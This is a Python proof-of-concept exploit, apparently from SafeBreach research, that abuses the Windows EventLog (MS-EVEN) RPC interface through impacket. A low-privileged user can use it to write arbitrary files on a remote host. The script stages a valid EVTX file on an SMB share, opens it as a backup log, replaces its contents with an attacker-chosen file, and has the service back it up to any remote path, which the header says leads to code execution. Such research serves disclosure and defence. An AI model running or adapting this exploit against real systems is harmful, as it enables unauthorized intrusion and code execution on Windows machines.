"""
@Author: Yarin A.
@Company: SafeBreach
@Description: This script uses the write primitive exposed by MS-EVEN
to execute code over SMB as a low-privileged user.
"""
import os
import shutil
import argparse

from impacket.dcerpc.v5 import even
from impacket.dcerpc.v5.dtypes import RPC_UNICODE_STRING
from impacket.dcerpc.v5.transport import DCERPCTransportFactory


class Attacker:
    """Client for the EventLog (MS-EVEN) RPC interface reached over a named pipe.

    Constructing an instance connects to the ``\\pipe\\eventlog`` endpoint of
    the given host, authenticates, and binds the MS-EVEN interface. Call
    ``close_connection`` when finished.
    """

    LOG_MSG_TEMPLATE = r"[+] - {message}"
    # String binding for the EventLog named pipe on the remote host.
    EVENT_LOG_NCACN = r"ncacn_np:{ip}[\pipe\eventlog]"
    RPC_C_AUTHN_LEVEL_PKT_INTEGRITY = 5
    SAMPLE_EVTX_FILENAME = r"Sample.evtx"
    # Name given to the working copy of the EVTX file.
    TEMP_EVTX_FILE_TEMPLATE = r"Temp_{valid_evtx_file}"
    # UNC path under which the working copy is referenced; the share name is
    # fixed to "Share".
    SHARE_PATH = r"\\{smb_server_ip}\Share\{local_file_path}"

    def __init__(self, ip: str, username: str, password: str, smb_server_ip: str) -> None:
        """Connect to ``ip``, authenticate, and bind the MS-EVEN interface.

        :param ip: Address of the host whose EventLog pipe is opened.
        :param username: Account name used for authentication.
        :param password: Password for ``username``.
        :param smb_server_ip: Address substituted into ``SHARE_PATH`` when
            building the UNC path of the staged EVTX file.
        """
        self.smb_server_ip = smb_server_ip

        self.log("Initializing Connection...")
        self.connection = DCERPCTransportFactory(self.EVENT_LOG_NCACN.format(ip=ip))

        self.log("Authenticating...")
        self.connection.set_credentials(username, password)
        self.connection.connect()

        self.dce = self.connection.get_dce_rpc()
        self.dce.set_auth_level(self.RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
        self.dce.connect()

        self.log("Binding MS-EVEN Interface...")
        self.dce.bind(even.MSRPC_UUID_EVEN)

    def create_rpc_unicode_string(self, regular_string: str) -> RPC_UNICODE_STRING:
        """Wrap ``regular_string`` in an ``RPC_UNICODE_STRING`` structure.

        :param regular_string: Text to place in the structure's ``Data`` field.
        :return: The populated structure, with ``MaximumLength`` raised by one.
        """
        crafted_unicode_string = RPC_UNICODE_STRING()
        crafted_unicode_string["Data"] = regular_string
        # NOTE(review): presumably leaves room for a terminator that the
        # server expects - confirm against the MS-EVEN string encoding.
        crafted_unicode_string.fields["MaximumLength"] += 1
        return crafted_unicode_string

    def create_target_evtx(self, src: str) -> str:
        """Copy ``src`` to ``Temp_<basename>`` and return the new name.

        The destination is a bare file name, so the copy is created relative
        to the current working directory.

        :param src: Path of the EVTX file to copy.
        :return: Name of the copy.
        """
        file_name = os.path.basename(src)
        dest_name = self.TEMP_EVTX_FILE_TEMPLATE.format(valid_evtx_file=file_name)
        shutil.copy(src, dest_name)
        return dest_name

    def cleanup(self, file_path: str) -> None:
        """Delete ``file_path`` if it exists; do nothing otherwise."""
        if os.path.exists(file_path):
            os.remove(file_path)

    def upload_file(self, local_file_path: str, remote_file_path: str, valid_evtx_file_path: str) -> None:
        """Stage a copy of an EVTX file and ask the service to back it up.

        Steps, in order:

        1. Copy ``valid_evtx_file_path`` to a ``Temp_``-prefixed working file.
        2. Open that file as a backup event log through its UNC share path.
        3. Overwrite the start of the working file with the contents of
           ``local_file_path`` followed by a single NUL byte.
        4. Request a backup of the opened log to ``remote_file_path``.

        The working file is left in place afterwards; ``cleanup`` can remove it.

        :param local_file_path: File whose bytes are written into the working copy.
        :param remote_file_path: Destination path passed to the backup request.
        :param valid_evtx_file_path: EVTX file used as the starting content.
        """
        temp_valid_evtx_file = self.create_target_evtx(valid_evtx_file_path)

        # NOTE(review): assumes the share named "Share" on smb_server_ip serves
        # the directory holding the working copy - verify the server setup.
        file_path_in_share = self.SHARE_PATH.format(
            smb_server_ip=self.smb_server_ip,
            local_file_path=os.path.basename(temp_valid_evtx_file),
        )
        unicode_valid_evtx_share_path = self.create_rpc_unicode_string(file_path_in_share)
        unicode_remote_path = self.create_rpc_unicode_string(remote_file_path)

        self.log("Starting upload to {0}".format(remote_file_path))

        # Read through a context manager so the handle is closed promptly
        # instead of being left for the garbage collector.
        with open(local_file_path, "rb") as local_file:
            local_file_path_data = local_file.read()

        with open(temp_valid_evtx_file, "rb+") as valid_evtx_file:
            # The log handle is obtained before the file content is replaced;
            # this ordering is intentional and must be preserved.
            handle = even.hElfrOpenBELW(self.dce, unicode_valid_evtx_share_path)

            # "rb+" does not truncate: bytes beyond the written length keep
            # their original EVTX content.
            valid_evtx_file.seek(0)
            valid_evtx_file.write(local_file_path_data + b"\x00")
            valid_evtx_file.flush()

            even.hElfrBackupELFW(self.dce, handle["LogHandle"], unicode_remote_path)

        self.log("Done!")

    def close_connection(self) -> None:
        """Disconnect the DCE/RPC session."""
        self.log("Disconnecting...")
        self.dce.disconnect()

    def log(self, message: str) -> None:
        """Print ``message`` using ``LOG_MSG_TEMPLATE``."""
        print(self.LOG_MSG_TEMPLATE.format(message=message))


def main() -> None:
    """Parse the command line, run one upload, and always disconnect."""
    parser = argparse.ArgumentParser()
    parser.add_argument("ip_to_attack")
    parser.add_argument("smb_server_ip")
    parser.add_argument("username")
    parser.add_argument("password")
    parser.add_argument("valid_evtx_file_path")
    parser.add_argument("local_file_path")
    parser.add_argument("remote_file_path")
    args = parser.parse_args()

    attacker = Attacker(
        args.ip_to_attack,
        username=args.username,
        password=args.password,
        smb_server_ip=args.smb_server_ip,
    )
    try:
        attacker.upload_file(
            local_file_path=args.local_file_path,
            remote_file_path=args.remote_file_path,
            valid_evtx_file_path=args.valid_evtx_file_path,
        )
    finally:
        # Release the RPC session even when the upload raises.
        attacker.close_connection()


if __name__ == "__main__":
    main()